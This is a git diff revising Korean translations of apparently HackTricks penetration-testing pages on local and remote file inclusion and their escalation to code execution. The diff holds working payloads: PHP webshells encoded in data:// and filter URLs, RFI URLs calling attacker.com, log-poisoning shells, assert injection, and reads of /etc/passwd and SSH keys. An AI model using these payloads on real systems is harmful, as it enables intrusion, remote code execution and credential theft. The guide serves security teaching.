-- **가짜 디렉토리로 시작하기**: 존재하지 않는 디렉토리(예: `a/`)로 경로를 시작하는 것은 일반적인 관행입니다. 이 기술은 예방 조치로 사용되거나 서버의 경로 파싱 논리 요구 사항을 충족하기 위해 사용됩니다.
+- **가짜 디렉토리로 시작하기**: 존재하지 않는 디렉토리(예: `a/`)로 경로를 시작하는 것이 일반적인 관행입니다. 이 기술은 예방 조치로 사용되거나 서버의 경로 파싱 논리 요구 사항을 충족하기 위해 사용됩니다.
 
 경로 단축 기술을 사용할 때는 서버의 경로 파싱 동작 및 파일 시스템 구조를 이해하는 것이 중요합니다. 각 시나리오는 다른 접근 방식을 요구할 수 있으며, 가장 효과적인 방법을 찾기 위해 테스트가 종종 필요합니다.
 
@@ -144,7 +144,7 @@ php에서는 기본적으로 비활성화되어 있습니다. **`allow_url_inclu
 http://example.com/index.php?page=http://atacker.com/mal.php
 http://example.com/index.php?page=\\attacker.com\shared\mal.php
 ```
-어떤 이유로 **`allow_url_include`**가 **On**이지만 PHP가 외부 웹페이지에 대한 접근을 **필터링**하는 경우, [이 게시물에 따르면](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), 예를 들어 base64로 인코딩된 PHP 코드를 디코드하고 RCE를 얻기 위해 데이터 프로토콜을 사용할 수 있습니다:
+어떤 이유로 **`allow_url_include`**가 **On**이지만 PHP가 외부 웹페이지에 대한 접근을 **filtering**하고 있다면, [이 게시물에 따르면](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), 예를 들어 base64로 인코딩된 PHP 코드를 디코드하고 RCE를 얻기 위해 데이터 프로토콜을 사용할 수 있습니다:
 ```
 PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
 ```
@@ -162,7 +162,7 @@ data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9
 # file_name is controlled by a user
 os.path.join(os.getcwd(), "public", file_name)
 ```
-사용자가 **`file_name`**에 **절대 경로**를 전달하면, **이전 경로는 단순히 제거됩니다**:
+사용자가 **`file_name`**에 **절대 경로**를 전달하면, **이전 경로가 제거됩니다**:
 ```python
 os.path.join(os.getcwd(), "public", "/etc/passwd")
 '/etc/passwd'
@@ -209,7 +209,7 @@ Java에서 경로 탐색(Path Traversal)이 있는 경우 **파일 대신 디렉
 
 ### php://filter
 
-PHP 필터는 데이터가 읽히거나 쓰이기 전에 기본 **수정 작업을 수행**할 수 있게 해줍니다. 필터는 5가지 범주로 나눌 수 있습니다:
+PHP 필터는 데이터가 읽히거나 쓰이기 전에 기본 **수정 작업을 수행**할 수 있게 해줍니다. 필터는 5가지 범주로 나뉩니다:
 
 - [String Filters](https://www.php.net/manual/en/filters.string.php):
 - `string.rot13`
@@ -225,7 +225,7 @@ PHP 필터는 데이터가 읽히거나 쓰이기 전에 기본 **수정 작업
 - `convert.iconv.*` : 다른 인코딩으로 변환합니다(`convert.iconv.<input_enc>.<output_enc>`). **지원되는 모든 인코딩 목록**을 얻으려면 콘솔에서 `iconv -l`을 실행하세요.
 
 > [!WARNING]
-> `convert.iconv.*` 변환 필터를 남용하면 **임의의 텍스트를 생성**할 수 있으며, 이는 임의의 텍스트를 작성하거나 include 프로세스와 같은 함수를 임의의 텍스트로 만들 때 유용할 수 있습니다. 더 많은 정보는 [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)를 확인하세요.
+> `convert.iconv.*` 변환 필터를 남용하면 **임의의 텍스트를 생성**할 수 있으며, 이는 임의의 텍스트를 작성하거나 include 프로세스를 통해 임의의 텍스트를 만들 때 유용할 수 있습니다. 더 많은 정보는 [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)를 확인하세요.
 
 - [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
 - `zlib.deflate`: 콘텐츠를 압축합니다 (많은 정보를 유출할 때 유용함)
@@ -236,7 +236,7 @@ PHP 필터는 데이터가 읽히거나 쓰이기 전에 기본 **수정 작업
 - Other Filters
 - php에서 `var_dump(stream_get_filters());`를 실행하면 몇 가지 **예상치 못한 필터**를 찾을 수 있습니다:
 - `consumed`
-- `dechunk`: HTTP 청크 인코딩을 역전환합니다.
+- `dechunk`: HTTP 청크 인코딩을 역전시킵니다.
 - `convert.*`
 ```php
 # String Filters
@@ -269,21 +269,21 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
 
 ### php 필터를 오라클로 사용하여 임의 파일 읽기
 
-[**이 게시물**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle)에서는 서버에서 반환된 출력 없이 로컬 파일을 읽는 기술이 제안되었습니다. 이 기술은 **php 필터를 오라클로 사용하여 파일을 불리언 방식으로 (문자별로) 유출하는 것**에 기반합니다. 이는 php 필터를 사용하여 텍스트를 충분히 크게 만들어 php가 예외를 발생시키도록 할 수 있기 때문입니다.
+[**이 게시물**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle)에서는 서버로부터 반환된 출력 없이 로컬 파일을 읽는 기술이 제안되었습니다. 이 기술은 **php 필터를 오라클로 사용하여 파일을 불리언 방식으로 유출하는 것**에 기반합니다. 이는 php 필터를 사용하여 텍스트를 충분히 크게 만들어 php가 예외를 발생시키도록 할 수 있기 때문입니다.
 
-원래 게시물에서는 기술에 대한 자세한 설명을 찾을 수 있지만, 여기 간단한 요약이 있습니다:
+원본 게시물에서는 기술에 대한 자세한 설명을 찾을 수 있지만, 여기 간단한 요약이 있습니다:
 
 - **`UCS-4LE`** 코덱을 사용하여 텍스트의 선행 문자를 시작 부분에 두고 문자열의 크기를 기하급수적으로 증가시킵니다.
 - 이는 **초기 문자가 올바르게 추측되었을 때 너무 큰 텍스트를 생성**하는 데 사용됩니다. 그러면 php가 **오류**를 발생시킵니다.
 - **dechunk** 필터는 **첫 번째 문자가 16진수가 아닐 경우 모든 것을 제거**하므로 첫 번째 문자가 16진수인지 알 수 있습니다.
-- 이것은 이전의 것과 결합되어 (추측된 문자에 따라 다른 필터도 사용됨) 텍스트의 시작 부분에서 문자를 추측할 수 있게 해줍니다. 충분한 변환을 수행하여 16진수 문자가 아니게 만들 때를 확인합니다. 16진수인 경우, dechunk는 삭제하지 않으며 초기 폭탄이 php 오류를 발생시킵니다.
-- **convert.iconv.UNICODE.CP930** 코덱은 각 문자를 다음 문자로 변환합니다 (따라서 이 코덱 이후: a -> b). 이를 통해 첫 번째 문자가 `a`인지 발견할 수 있습니다. 예를 들어, 이 코덱을 6번 적용하면 a->b->c->d->e->f->g가 되어 문자가 더 이상 16진수 문자가 아니게 되므로 dechunk는 삭제하지 않고 php 오류가 발생합니다.
+- 이것은 이전의 것과 결합되어 (추측된 문자에 따라 다른 필터도 사용) 텍스트의 시작 부분에서 문자를 추측할 수 있게 해줍니다. 충분한 변환을 수행하여 16진수 문자가 아닌 경우를 확인합니다. 16진수라면 dechunk는 삭제하지 않으며 초기 폭탄이 php 오류를 발생시킵니다.
+- **convert.iconv.UNICODE.CP930** 코덱은 각 문자를 다음 문자로 변환합니다 (예: a -> b). 이를 통해 첫 번째 문자가 `a`인지 발견할 수 있습니다. 예를 들어, 이 코덱을 6번 적용하면 a->b->c->d->e->f->g가 되어 문자가 더 이상 16진수 문자가 아니게 됩니다. 따라서 dechunk는 삭제하지 않으며 php 오류가 초기 폭탄과 곱해져 발생합니다.
 - **rot13**과 같은 다른 변환을 시작 부분에 사용하면 n, o, p, q, r과 같은 다른 문자를 유출할 수 있습니다 (다른 코덱을 사용하여 다른 문자를 16진수 범위로 이동할 수 있습니다).
-- 초기 문자가 숫자일 경우, 이를 base64로 인코딩하고 숫자를 유출하기 위해 처음 두 문자를 유출해야 합니다.
-- 최종 문제는 **초기 문자 이상을 유출하는 방법**을 보는 것입니다. **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE**와 같은 순서 메모리 필터를 사용하면 문자의 순서를 변경하고 텍스트의 첫 번째 위치에 다른 문자를 가져올 수 있습니다.
-- 추가 데이터를 얻기 위해서는 **초기 부분에 2바이트의 쓰레기 데이터를 생성**하는 아이디어가 필요합니다. **convert.iconv.UTF16.UTF16**을 사용하고, **UCS-4LE**를 적용하여 **다음 2바이트와 피벗**을 만들고, **쓰레기 데이터까지 데이터를 삭제**합니다 (이것은 초기 텍스트의 처음 2바이트를 제거합니다). 원하는 비트를 유출할 때까지 계속 진행합니다.
+- 초기 문자가 숫자일 경우 base64로 인코딩하고 첫 두 문자를 유출하여 숫자를 유출해야 합니다.
+- 최종 문제는 **초기 문자 이상을 유출하는 방법**을 보는 것입니다. **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE**와 같은 순서 메모리 필터를 사용하면 문자 순서를 변경하고 텍스트의 첫 번째 위치에 다른 문자를 가져올 수 있습니다.
+- 추가 데이터를 얻기 위해서는 **초기 부분에 2바이트의 쓰레기 데이터를 생성**하는 아이디어가 필요합니다. **convert.iconv.UTF16.UTF16**을 사용하고 **UCS-4LE**를 적용하여 **다음 2바이트와 피벗**을 만들고, **쓰레기 데이터까지 데이터를 삭제**합니다 (이것은 초기 텍스트의 첫 2바이트를 제거합니다). 원하는 비트를 유출할 때까지 계속 진행합니다.
 
-게시물에서는 이를 자동으로 수행할 수 있는 도구도 유출되었습니다: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
+게시물에서는 이를 자동으로 수행하는 도구도 유출되었습니다: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
 
 ### php://fd
 
@@ -333,7 +333,7 @@ http://example.com/index.php?page=expect://ls
 ```
 ### input://
 
-POST 매개변수에 페이로드를 지정하세요:
+POST 매개변수에 페이로드를 지정하십시오:
 ```bash
 curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
 ```
@@ -356,7 +356,7 @@ php --define phar.readonly=0 create_path.php
 
 LFI가 PHP 코드 실행 없이 파일 읽기만 수행하는 경우, `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, 또는 `filesize()`와 같은 함수를 통해 역직렬화 취약점을 악용할 수 있습니다. 이 취약점은 `phar` 프로토콜을 사용하여 파일을 읽는 것과 관련이 있습니다.
 
-`.phar` 파일의 역직렬화 취약점을 악용하는 방법에 대한 자세한 내용은 아래 링크된 문서를 참조하십시오:
+`.phar` 파일의 맥락에서 역직렬화 취약점을 악용하는 방법에 대한 자세한 내용은 아래 링크된 문서를 참조하십시오:
 
 [Phar Deserialization Exploitation Guide](phar-deserialization.md)
 
@@ -385,7 +385,7 @@ phar-deserialization.md
 
 ## LFI via PHP's 'assert'
 
-PHP의 'assert' 함수는 문자열 내에서 코드를 실행할 수 있어 Local File Inclusion (LFI) 위험이 특히 높습니다. 입력에 ".."와 같은 디렉토리 탐색 문자가 포함되어 있지만 제대로 정리되지 않는 경우 특히 문제가 됩니다.
+PHP의 'assert' 함수와 관련된 Local File Inclusion (LFI) 위험은 문자열 내에서 코드를 실행할 수 있기 때문에 특히 높습니다. 입력에 ".."와 같은 디렉토리 탐색 문자가 포함되어 있지만 제대로 정리되지 않는 경우 특히 문제가 됩니다.
 
 예를 들어, PHP 코드는 다음과 같이 디렉토리 탐색을 방지하도록 설계될 수 있습니다:
 ```bash
@@ -395,7 +395,7 @@ assert("strpos('$file', '..') === false") or die("");
 ```plaintext
 ' and die(highlight_file('/etc/passwd')) or '
 ```
-마찬가지로, 임의의 시스템 명령을 실행하기 위해서는 다음을 사용할 수 있습니다:
+마찬가지로, 임의의 시스템 명령을 실행하기 위해 다음을 사용할 수 있습니다:
 ```plaintext
 ' and die(system("id")) or '
 ```
@@ -404,17 +404,17 @@ assert("strpos('$file', '..') === false") or die("");
 ## PHP 블라인드 경로 탐색
 
 > [!WARNING]
-> 이 기술은 **PHP 함수**의 **파일 경로**를 **제어**할 수 있는 경우에 관련이 있으며, 이 함수는 **파일에 접근**하지만 파일의 내용을 볼 수는 없습니다(예: **`file()`**에 대한 간단한 호출과 같이) 파일의 내용은 표시되지 않습니다.
+> 이 기술은 **PHP 함수**의 **파일 경로**를 **제어**할 수 있는 경우에 관련이 있으며, 이 함수는 **파일에 접근**하지만 파일의 내용을 볼 수는 없습니다(예: **`file()`**에 대한 간단한 호출과 같이) 내용이 표시되지 않습니다.
 
 [**이 놀라운 게시물**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)에서는 블라인드 경로 탐색이 PHP 필터를 통해 **오류 오라클을 통해 파일의 내용을 유출하는 방법**이 설명되어 있습니다.
 
 요약하자면, 이 기술은 **"UCS-4LE" 인코딩**을 사용하여 파일의 내용을 **매우 크게** 만들어 **파일을 여는 PHP 함수**가 **오류**를 발생시키도록 합니다.
 
-그런 다음, 첫 번째 문자를 유출하기 위해 필터 **`dechunk`**가 사용되며, **base64** 또는 **rot13**와 같은 다른 필터와 함께 사용되고, 마지막으로 필터 **convert.iconv.UCS-4.UCS-4LE**와 **convert.iconv.UTF16.UTF-16BE**가 사용되어 **다른 문자를 시작 부분에 배치하고 유출합니다**.
+그런 다음, 첫 번째 문자를 유출하기 위해 필터 **`dechunk`**가 사용되며, **base64** 또는 **rot13**와 같은 다른 필터와 함께 사용되고, 마지막으로 필터 **convert.iconv.UCS-4.UCS-4LE** 및 **convert.iconv.UTF16.UTF-16BE**가 사용되어 **다른 문자를 시작 부분에 배치하고 유출합니다**.
 
 **취약할 수 있는 함수**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (이것으로만 읽기 전용 대상)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
 
-기술적인 세부사항은 언급된 게시물을 확인하세요!
+기술적 세부사항은 언급된 게시물을 확인하세요!
 
 ## LFI2RCE
 
@@ -424,14 +424,14 @@ assert("strpos('$file', '..') === false") or die("");
 
 ### Apache/Nginx 로그 파일을 통한
 
-Apache 또는 Nginx 서버가 **LFI에 취약**한 경우 포함 함수 내에서 **`/var/log/apache2/access.log` 또는 `/var/log/nginx/access.log`**에 접근을 시도할 수 있으며, **user agent** 또는 **GET 매개변수** 내에 **`<?php system($_GET['c']); ?>`**와 같은 PHP 쉘을 설정하고 해당 파일을 포함할 수 있습니다.
+Apache 또는 Nginx 서버가 **LFI에 취약**한 경우 포함 함수 내에서 **`/var/log/apache2/access.log` 또는 `/var/log/nginx/access.log`**에 접근하려고 시도할 수 있으며, **사용자 에이전트** 또는 **GET 매개변수** 내에 **`<?php system($_GET['c']); ?>`**와 같은 PHP 쉘을 설정하고 해당 파일을 포함할 수 있습니다.
 
 > [!WARNING]
-> 쉘에 대해 **단일 인용부호** 대신 **이중 인용부호**를 사용하면 이중 인용부호가 "_**quote;**_" 문자열로 수정되며, **PHP는 그곳에서 오류를 발생시킵니다** 그리고 **다른 것은 실행되지 않습니다**.
+> 쉘에 대해 **단일 인용부호** 대신 **이중 인용부호**를 사용하면 이중 인용부호가 "_**quote;**_" 문자열로 수정되므로, **PHP는 오류를 발생시킵니다**. 그리고 **다른 것은 실행되지 않습니다**.
 >
-> 또한, **페이로드를 올바르게 작성해야 합니다**. 그렇지 않으면 PHP는 로그 파일을 로드하려고 할 때마다 오류가 발생하며 두 번째 기회를 갖지 못할 것입니다.
+> 또한, **페이로드를 올바르게 작성해야** 하며, 그렇지 않으면 PHP는 로그 파일을 로드하려고 할 때마다 오류가 발생하고 두 번째 기회를 갖지 못합니다.
 
-이것은 다른 로그에서도 수행할 수 있지만 **주의하세요**, 로그 내의 코드는 URL 인코딩될 수 있으며 이는 쉘을 파괴할 수 있습니다. 헤더 **authorisation "basic"**는 Base64로 "user:password"를 포함하며 로그 내에서 디코딩됩니다. PHPShell은 이 헤더 내에 삽입될 수 있습니다.\
+이 작업은 다른 로그에서도 수행할 수 있지만 **주의하세요**, 로그 내의 코드는 URL 인코딩될 수 있으며, 이는 쉘을 파괴할 수 있습니다. 헤더 **authorisation "basic"**는 Base64로 "user:password"를 포함하며, 로그 내에서 디코딩됩니다. PHPShell은 이 헤더 내에 삽입될 수 있습니다.\
 다른 가능한 로그 경로:
 ```python
 /var/log/apache2/access.log
@@ -448,16 +448,16 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
 
 ### 이메일을 통한 방법
 
-**내부 계정(user@localhost)으로 메일을 보내고** PHP 페이로드를 포함시킵니다. 예: `<?php echo system($_REQUEST["cmd"]); ?>` 그리고 **`/var/mail/<USERNAME>`** 또는 **`/var/spool/mail/<USERNAME>`** 경로를 사용하여 사용자의 메일에 포함시키도록 시도합니다.
+**내부 계정(user@localhost)으로 메일을 보내고** PHP 페이로드를 포함합니다. 예: `<?php echo system($_REQUEST["cmd"]); ?>` 그리고 **`/var/mail/<USERNAME>`** 또는 **`/var/spool/mail/<USERNAME>`** 경로를 사용하여 사용자의 메일에 포함시키도록 시도합니다.
 
 ### /proc/\*/fd/\*를 통한 방법
 
 1. 많은 쉘을 업로드합니다 (예: 100개)
-2. [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD)를 포함시킵니다. 여기서 $PID는 프로세스의 PID(무차별 대입 가능)이고 $FD는 파일 디스크립터(무차별 대입 가능)입니다.
+2. [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD)를 포함합니다. 여기서 $PID는 프로세스의 PID(무작위로 추측 가능)이고 $FD는 파일 디스크립터(무작위로 추측 가능)입니다.
 
 ### /proc/self/environ을 통한 방법
 
-로그 파일처럼, User-Agent에 페이로드를 보내면 /proc/self/environ 파일 안에 반영됩니다.
+로그 파일처럼, User-Agent에 페이로드를 보내면 /proc/self/environ 파일 내에 반영됩니다.
 ```
 GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: <?=phpinfo(); ?>
@@ -470,7 +470,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 ```
 파일을 읽기 쉽게 유지하기 위해서는 사진/doc/pdf의 메타데이터에 주입하는 것이 가장 좋습니다.
 
-### Zip 파일 업로드를 통한 방법
+### Zip 파일 업로드를 통한
 
 PHP 셸이 압축된 ZIP 파일을 업로드하고 접근합니다:
 ```python
@@ -498,18 +498,18 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 ```
 ### Via ssh
 
-ssh가 활성화되어 있으면 사용 중인 사용자를 확인하십시오 (/proc/self/status & /etc/passwd) 그리고 **\<HOME>/.ssh/id_rsa**에 접근해 보십시오.
+ssh가 활성화되어 있으면 사용 중인 사용자 확인하기 (/proc/self/status & /etc/passwd) 및 **\<HOME>/.ssh/id_rsa**에 접근 시도하기
 
 ### **Via** **vsftpd** _**logs**_
 
-FTP 서버 vsftpd의 로그는 _**/var/log/vsftpd.log**_에 위치합니다. Local File Inclusion (LFI) 취약점이 존재하고 노출된 vsftpd 서버에 접근할 수 있는 시나리오에서는 다음 단계를 고려할 수 있습니다:
+FTP 서버 vsftpd의 로그는 _**/var/log/vsftpd.log**_에 위치합니다. Local File Inclusion (LFI) 취약점이 존재하고 노출된 vsftpd 서버에 접근할 수 있는 경우, 다음 단계를 고려할 수 있습니다:
 
-1. 로그인 과정에서 사용자 이름 필드에 PHP 페이로드를 주입합니다.
-2. 주입 후, LFI를 이용하여 _**/var/log/vsftpd.log**_에서 서버 로그를 검색합니다.
+1. 로그인 과정에서 사용자 이름 필드에 PHP 페이로드 주입하기.
+2. 주입 후, LFI를 이용하여 _**/var/log/vsftpd.log**_에서 서버 로그를 검색하기.
 
 ### Via php base64 filter (using base64)
 
-[이](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) 기사에서 보여준 것처럼, PHP base64 필터는 Non-base64를 무시합니다. 이를 사용하여 파일 확장자 검사를 우회할 수 있습니다: ".php"로 끝나는 base64를 제공하면, 단순히 "."를 무시하고 "php"를 base64에 추가합니다. 다음은 예시 페이로드입니다:
+[이](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) 기사에서 보여준 것처럼, PHP base64 필터는 Non-base64를 무시합니다. 이를 사용하여 파일 확장자 검사를 우회할 수 있습니다: ".php"로 끝나는 base64를 제공하면, "."를 무시하고 "php"를 base64에 추가합니다. 다음은 예시 페이로드입니다:
 ```url
 http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
 
@@ -525,7 +525,7 @@ lfi2rce-via-php-filters.md
 
 ### Via segmentation fault
 
-**파일을 업로드**하여 `/tmp`에 **임시로** 저장한 다음, **같은 요청에서** **세그멘테이션 오류**를 발생시키면 **임시 파일이 삭제되지 않고** 검색할 수 있습니다.
+**Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it.
 
 {{#ref}}
 lfi2rce-via-segmentation-fault.md
@@ -533,7 +533,7 @@ lfi2rce-via-segmentation-fault.md
 
 ### Via Nginx temp file storage
 
-**로컬 파일 포함**을 발견하고 **Nginx**가 PHP 앞에서 실행되고 있다면 다음 기술을 사용하여 RCE를 얻을 수 있습니다:
+**Local File Inclusion**을 발견하고 **Nginx**가 PHP 앞에서 실행되고 있다면 다음 기술을 사용하여 RCE를 얻을 수 있습니다:
 
 {{#ref}}
 lfi2rce-via-nginx-temp-files.md
@@ -541,7 +541,7 @@ lfi2rce-via-nginx-temp-files.md
 
 ### Via PHP_SESSION_UPLOAD_PROGRESS
 
-**로컬 파일 포함**을 발견했더라도 **세션이 없고** `session.auto_start`가 `Off`인 경우, **`PHP_SESSION_UPLOAD_PROGRESS`**를 **multipart POST** 데이터에 제공하면 PHP가 **세션을 활성화**합니다. 이를 악용하여 RCE를 얻을 수 있습니다:
+**Local File Inclusion**을 발견했지만 **세션이 없고** `session.auto_start`가 `Off`인 경우에도 가능합니다. **multipart POST** 데이터에 **`PHP_SESSION_UPLOAD_PROGRESS`**를 제공하면 PHP가 **세션을 활성화**합니다. 이를 악용하여 RCE를 얻을 수 있습니다:
 
 {{#ref}}
 via-php_session_upload_progress.md
@@ -549,7 +549,7 @@ via-php_session_upload_progress.md
 
 ### Via temp file uploads in Windows
 
-**로컬 파일 포함**을 발견하고 서버가 **Windows**에서 실행되고 있다면 RCE를 얻을 수 있습니다:
+**Local File Inclusion**을 발견하고 서버가 **Windows**에서 실행되고 있다면 RCE를 얻을 수 있습니다:
 
 {{#ref}}
 lfi2rce-via-temp-file-uploads.md
@@ -557,7 +557,7 @@ lfi2rce-via-temp-file-uploads.md
 
 ### Via `pearcmd.php` + URL args
 
-[**이 게시물에서 설명된 바와 같이**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), 스크립트 `/usr/local/lib/phppearcmd.php`는 php 도커 이미지에 기본적으로 존재합니다. 또한, URL 매개변수가 `=`가 없으면 인수로 사용해야 한다고 명시되어 있기 때문에 URL을 통해 스크립트에 인수를 전달할 수 있습니다.
+[**이 포스트에서 설명된 바와 같이**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), 스크립트 `/usr/local/lib/phppearcmd.php`는 php 도커 이미지에서 기본적으로 존재합니다. 또한, URL 매개변수가 `=`가 없으면 인수로 사용해야 한다고 명시되어 있기 때문에 URL을 통해 스크립트에 인수를 전달할 수 있습니다.
 
 다음 요청은 `/tmp/hello.php`에 `<?=phpinfo()?>`라는 내용을 가진 파일을 생성합니다:
 ```bash
@@ -580,13 +580,13 @@ lfi2rce-via-phpinfo.md
 
 ### compress.zlib + `PHP_STREAM_PREFER_STUDIO` + 경로 노출을 통한 방법
 
-**Local File Inclusion**을 발견하고 **임시 파일의 경로를 추출할 수 있지만** **서버**가 **포함할 파일에 PHP 마크가 있는지 확인**하고 있다면, 이 **Race Condition**을 사용하여 **그 검사를 우회**할 수 있습니다:
+**Local File Inclusion**을 발견하고 **임시 파일의 경로를 추출할 수 있지만** **서버**가 **포함할 파일에 PHP 마크가 있는지 확인**하고 있다면, 이 **경쟁 조건**을 사용하여 **그 검사를 우회**할 수 있습니다:
 
 {{#ref}}
 lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
 {{#endref}}
 
-### 영원한 대기 + 브루트포스
+### 영원한 대기 + 브루트포스 방법
 
 LFI를 악용하여 **임시 파일을 업로드**하고 서버가 PHP 실행을 **중단**하게 만들 수 있다면, **몇 시간 동안 파일 이름을 브루트포스**하여 임시 파일을 찾을 수 있습니다:
 
@@ -594,12 +594,12 @@ LFI를 악용하여 **임시 파일을 업로드**하고 서버가 PHP 실행을
 lfi2rce-via-eternal-waiting.md
 {{#endref}}
 
-### 치명적인 오류로
+### 치명적 오류로
 
-파일 `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar` 중 하나를 포함하면 됩니다. (그 오류를 발생시키기 위해 같은 파일을 2번 포함해야 합니다).
+파일 `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar` 중 하나를 포함하면 됩니다. (같은 파일을 2번 포함해야 그 오류가 발생합니다).
 
 **이것이 어떻게 유용한지는 모르겠지만, 유용할 수 있습니다.**\
-&#xNAN;_&#x45;PHP 치명적인 오류를 발생시켜도, 업로드된 PHP 임시 파일은 삭제됩니다._
+&#xNAN;_&#x45;PHP 치명적 오류를 발생시켜도, 업로드된 PHP 임시 파일은 삭제됩니다._
 
 <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
 
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index f459ac317..4f7840484 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -6,7 +6,7 @@
 
 `PHP_STREAM_PREFER_STDIO` 플래그와 함께 `compress.zlib://` 프로토콜을 사용하여 열린 파일은 나중에 연결에 도착하는 데이터를 동일한 파일에 계속 쓸 수 있습니다.
 
-이것은 다음과 같은 호출을 의미합니다:
+이는 다음과 같은 호출을 의미합니다:
 ```php
 file_get_contents("compress.zlib://http://attacker.com/file")
 ```
@@ -28,12 +28,12 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
 
 공격자는 **피해자 서버가 공격자의 서버에서 파일을 읽는 연결을 열도록** 할 것입니다 **`compress.zlib`** 프로토콜을 사용하여.
 
-**이 연결**이 존재하는 동안 공격자는 **생성된 임시 파일의 경로를 유출**할 것입니다 (서버에 의해 유출됨).
+**연결**이 존재하는 동안 공격자는 **임시 파일의 경로를 유출**할 것입니다 (서버에 의해 유출됨).
 
-**연결**이 여전히 열려 있는 동안 공격자는 **그가 제어하는 임시 파일을 로드하는 LFI를 이용**할 것입니다.
+**연결**이 여전히 열려 있는 동안 공격자는 **그가 제어하는 임시 파일을 로드하는 LFI를 악용**할 것입니다.
 
-그러나 웹 서버에는 **`<?`**가 포함된 파일을 로드하는 것을 **방지하는 체크**가 있습니다. 따라서 공격자는 **경쟁 조건**을 악용할 것입니다. 여전히 열려 있는 연결에서 **공격자**는 **웹 서버**가 **금지된 문자가 포함되어 있는지 확인한 후** **PHP 페이로드를 전송할 것입니다** 그러나 **내용을 로드하기 전에**.
+그러나 웹 서버에는 **`<?`**가 포함된 파일을 로드하는 것을 **방지하는 체크**가 있습니다. 따라서 공격자는 **Race Condition**을 악용할 것입니다. 여전히 열려 있는 연결에서 **공격자**는 **웹서버**가 **금지된 문자가 포함되어 있는지 체크한 후** **PHP 페이로드를 전송**할 것입니다. 그러나 **내용을 로드하기 전에**입니다.
 
-자세한 내용은 [https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)에서 경쟁 조건 및 CTF 설명을 확인하세요.
+자세한 정보는 [https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)에서 Race Condition 및 CTF 설명을 확인하세요.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index e17ed95e5..5a86d6fb7 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-기본적으로 PHP에 파일이 업로드되면 (예상하지 않더라도) **`/tmp`**에 **`php[a-zA-Z0-9]{6}`**와 같은 이름의 임시 파일이 생성됩니다. 그러나 일부 도커 이미지에서는 생성된 파일에 숫자가 포함되지 않는 경우도 보았습니다.
